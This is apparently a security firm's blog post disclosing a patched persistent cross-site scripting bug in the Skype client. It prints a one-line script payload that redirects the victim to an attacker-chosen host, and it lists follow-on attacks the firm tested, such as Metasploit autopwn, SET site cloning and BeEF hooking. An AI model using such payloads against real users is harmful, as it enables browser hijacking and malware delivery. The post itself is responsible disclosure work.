Skype Bug Full Disclosure

Skype has patched and released the fix for the Skype bug we found so we can discuss the details of the bug.

Several other people have reported the same bug. Basically it is a persistant XSS attack that allows an attacker to redirect a victim to any website hosting malware. It is caused by Skype failing to sanitize a message before the client renders the message. It is persistant because it is stored in the users chat history and the payload is re-executed everytime the contact is clicked. It requires no user interation and can be triggered just by sending a message. As far as we could tell there was no setting to prevent this. The following proof of concept demonstrates this:

http://www.example.com/?foo="><script>document.location='http://10.11.1.225';</script>

The success of this attack is up to the attackers imagination. Some of the examples Pure Hacking tested were:

1) Using a browser exploit to execute shellcode
2) Using metasploits browser autopwn
3) Using SET to clone the skype.com website so the victim was redirected to what looked like the Skype website and running a malicious java applet
4) Using Beef to hook in a zombie
5) Using the the javascript attack API

Several people have also asked us to test the 2.x version of skype. As far as we could tell it was not vulnerable at this stage.

The screenshot below shows the victims client being redirected to the javascript attack API. The victims browser has then been hijacked using the $A.hijackView({url:'http://www.purehacking.com/'}) function.

Post new comment

The content of this field is kept private and will not be shown publicly.

Most Popular List

06/05/2011 | Written By Gordon Maddern | 63,717 Hits
About a month ago I was chatting on skype to a colleague about a payload for...
15/10/2011 | Written By Ty Miller | 18,896 Hits
Lets say that at some point you decided to adhere to security best practices...
28/06/2011 | Written By Sandeep Nain | 15,636 Hits
Coming from a family of civil engineers, I always knew that it is a rigorous...
24/05/2011 | Written By Gordon Maddern | 8,841 Hits
Skype has patched and released the fix for the Skype bug we found so we can d...

Most Recent Posts List

03/06/2013 | Written By Josh Zlatin | 1,273 Hits
I am happy to announce the ModSecurit...
19/05/2013 | Written By Josh Zlatin | 3,719 Hits
Often when implementing customised ModSecurity solutions we need to...
07/05/2013 | Written By Richard Brown | 642 Hits
The term ‘ethical hacker’ is often misrepresented as the keywords...
05/04/2013 | Written By Gordon Maddern | 612 Hits
I recently had to go in to bat for a client who was told by their PCI auditor...